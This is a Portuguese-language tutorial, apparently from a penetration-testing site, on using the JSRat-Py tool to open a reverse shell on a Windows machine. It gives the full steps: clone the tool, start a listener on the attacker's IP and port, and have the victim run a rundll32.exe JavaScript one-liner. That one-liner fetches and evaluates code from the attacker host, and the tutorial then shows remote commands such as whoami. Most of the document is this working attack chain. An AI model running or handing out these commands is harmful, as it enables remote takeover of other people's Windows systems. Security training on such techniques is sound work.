O JSRat é uma ferramenta desenvolvida em Python que permite a realização de uma conexão reversa em um host Windows via JavaScript através dos executáveis rundll32.exe e regsvr32.exe.

Projeto : github.com/Hood3dRob1n/JSRat-Py.git

01 - Passo

Realize o download do JSRat-Py, liste o conteúdo do diretório:

Linux
git clone http://github.com/Hood3dRob1n/JSRat-Py.git

cd JSRat-Py/

ls -l

02 - Passo

Confirme o IP do seu host através do comando ipconfig.

Linux
ipconfig

03 - Passo

Defina o IP e a Porta de conexão (Atacante), neste exemplo o IP do Linux.

Linux
./JSRat.py -i 192.168.0.100 -p 8080

04 - Passo

Na linha Cliente Command at: será gerada uma URL que deve ser aberta no host Windows (Vítima).

http://192.168.0.100:8080/wtf

Linux
[*] Client Command at: http://192.168.0.100:8080/wtf

05 - Passo

Agora no host Windows acesse a URL: http://192.168.0.100:8080/wtf/ e copie o comando a seguir :

Linux
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1")
;h.Open("GET","http://192.168.0.100:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}
catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

06 - Passo

Execute o comando no Prompt de Comando e pressione ENTER.

07 - Passo

Ao retornar ao host Linux observe que a conexão foi estabelecida e que uma relação de comandos foi disponibilizada.

08 - Passo

Basta digitar os comandos do Windows, veja alguns exemplos :

Linux
$(JSRat)> hostname

$(JSRat)> ipconfig

$(JSRat)> whoami

09 - Passo

Para sair digite o comando exit, em seguida CTRL + C.

Linux
$(JSRat)> exit

[-] OK, sending rundll32 kill command to Client...
   [-] Hit CTRL+C to kill server....
^C
[ERROR] CTRL+C Interupt Detected!
   [x] Shutting Down Web Server...


  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2020 - 100SECURITY

Contato